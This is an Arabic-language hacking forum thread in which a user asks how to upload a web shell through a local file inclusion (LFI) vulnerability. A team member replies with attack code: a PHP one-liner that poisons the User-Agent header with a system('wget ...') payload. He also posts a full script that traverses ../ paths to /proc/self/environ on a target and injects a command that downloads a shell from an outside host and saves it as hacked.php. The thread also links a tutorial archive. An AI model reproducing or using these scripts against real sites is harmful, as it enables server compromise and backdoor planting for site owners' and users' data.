التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-19-2010, 02:35 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





حربي هكر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
حربي هكر is on a distinguished road

افتراضي غير مجاب: مشكله برفع شل ثغرة LF


السلام عليكم ؟ اخواني انا اليوم مسكت معي ارفع شل بثغرة L F I

بس تابعت شرح ؟؟ بس مو واضح الي بالدوره والله مو واضح وملخبط مرة

فيه شرح ؟؟ عن طريق اضافه اداه فايرفوكس ؟؟

بس ممكن شخص يدلني على الطريقه




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gi fvtu ag eyvm LF

   

رد مع اقتباس
قديم 10-19-2010, 10:09 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية DaRk DrEaM
 

 

 
إحصائية العضو






DaRk DrEaM غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DaRk DrEaM is on a distinguished road

افتراضي


بأنتظار أحد الخبراء في هذا المجال يا غالي

   

رد مع اقتباس
قديم 10-19-2010, 05:26 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


عندك اكثر من طريقه للرفع كله يوصل لنفس الناتج

اهم شيء انك تقرا ملف

كود PHP:
proc/self/environ 
لو عرفت تقراه معناه غصب راح نرفع لك شيل منها !!
شوف هون

كود:
 http://sc0rpion.ir/tutorial-clips/Getting-shell-by-lfi-via-user-agent.rar 
PHP script :
كود PHP:
<?php  ini_set('user_agent' "<?php system('wget [shell] -O user.php'); ?> "); $result file_get_contents('http://[site]/../../proc/self/environ'); ?>

هاد كود php بتعدل عليه الي بلزم ومعاه شرح يرفع لك شل بنفس الاسلوب لكن بدون الفايرفوكس !!

كمان كود اخر يقوم بنفس العمليه بس يختلف قليلا (رغم اني اشوفه فاشل بدون تجربه


كود PHP:

<?php

//Get Shell Via LFI(Local File Inclusion)
//Copyright BlackDream 2009 
//mr.pr0n you are the best boy


//edit this if you want. Linux Command
$cmd "<?php system(\"wget http://h1.Spam.com/s0ra/s0ra.txt; mv shell.txt hacked.php\");?>";
$site "http://www.evilsite.com/index.php?page="//enter it like http://www.thesite.com/index.php?page=
$proc_path "proc/self/environ"//without first slash


//Do not edit below this line

preg_match"@^(http://.*?)(/|$)@"$site$matches );

$path "";
$i 0;

while ( 
)
{
    if ( 
$i >= 20 )
        break;

    
$path .= "../";
    
$source page_get_*******( $site $path $proc_path );
    if ( 
strstr($source'********_ROOT') != false )
    {
        exit( 
"\nShell Uploaded With Success -> " $matches[1] . '/' "hacked.php" );
    } else
        echo 
"\nFail at state " $i "\n";
    
$i++;
}

function 
page_get_*******( $url )
{
    global 
$cmd;
    
$ch curl_init$url );
    
curl_setopt$chCURLOPT_RETURNTRANSFERtrue );
    
curl_setopt$chCURLOPT_HEADER);
    
curl_setopt$chCURLOPT_USERAGENT$cmd );
    
curl_setopt$chCURLOPT_CONNECTTIMEOUT);
    
curl_setopt$chCURLOPT_TIMEOUT);
    
$ret curl_exec$ch );
    
curl_close$ch );
    return 
$ret;
}

?>



وهاد شرح روعه لسا ولا عربي شرحه 

ركز فيه كويس هو استخدم اسلوب سهل كثير

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكله بـ اكتشاف ثغرة وتحليل السيكربت حربي هكر جـــ'ابات العناكــ'ب 0 08-07-2010 08:47 PM
مساعده برفع شل من ebay-clone awras جـــ'ابات العناكــ'ب 4 04-22-2010 02:53 PM
مشكله في ثغرة حقن ؟؟؟ T-72 جـــ'ابات العناكــ'ب 8 03-20-2010 11:17 PM
فشل برفع الشل ؟؟ T-72 جـــ'ابات العناكــ'ب 4 01-22-2010 11:19 PM
لكل من واجه مشكله في ترقيع ثغرة vBulletin 3.8.4 PL1 XSS تم الحل xman2 قســم تطويــر المــــواقع 4 12-08-2009 03:11 PM


الساعة الآن 10:38 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0